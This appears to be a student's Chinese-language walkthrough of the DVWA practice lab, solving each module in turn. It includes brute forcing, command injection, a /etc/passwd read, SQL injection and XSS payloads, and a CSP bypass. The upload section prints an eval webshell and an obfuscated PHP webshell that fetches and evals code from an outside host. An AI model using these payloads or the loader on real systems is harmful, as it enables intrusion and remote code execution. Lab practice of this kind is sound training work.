目录
DVWA简单难度
Brute Force = 尝试登录成功
Burp抓包->发送到Intruder->猜测用户名为admin->用字典爆破
得到密码password
Command Injection = 尝试在服务器上列根目录
输入127.0.0.1&&ls /
File Inclusion = 尝试读取到服务器的密码
输入etc/passwd
得到
root: x:0:0:root:/root:/bin/bash daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
然后不会了。。
File Upload = 上传一个PHP木马,并连接成功
上传一句话木马<?php eval($_POST['aa']);?>
访问https://sqli-lab.practice.rois.io/hackable/uploads/1.php
用菜刀无法连接总是出现500
百度找过狗一句话
最后找到一个可以用的
<?php
$password='myhack58';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>
SQL Injection = 尝试拿到当前表名
依次输入
1’ union select 1,database()#
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
得到表名 guestbook,users
SQL Injection (Blind) = 尝试拿到当前数据库名
1.输入1’ and length(database())>4#提示不存在
输入1’ and length(database())>3#存在,所以数据库名的长度为4
2.然后用1’ and ascii(substr(database(),n,1))>100#来获得数据库名
3.最后得到数据库名为dvwa
XSS (DOM) = 尝试弹一个对话框
查看源代码发现上述位置可以进行XSS攻击
访问https://sqli-lab.practice.rois.io/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(0)%3C/script%3E 即可
XSS (Reflected) = 尝试弹一个对话框
输入直接输入<script>alert(0)</script>
即可
XSS (Stored) = 尝试弹一个对话框
直接输入
<script>alert(0)</script>
即可
CSP Bypass = 尝试弹一个对话框
查看源代码
Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;
发现可以加载https://pastebin.com中的script
去https://pastebin.com发布alert(1)
在输入框中填入https://pastebin.com/raw/HLLRVw2F
成功弹出一个对话框
JavaScript = 尝试拿到正确的Token
提交success发现提示错误的token
看源代码发现token是在前台生成的所以只要输入success在执行一次generate_token()就可以了
token=38581812b435834ebf84ebcc2c6424d6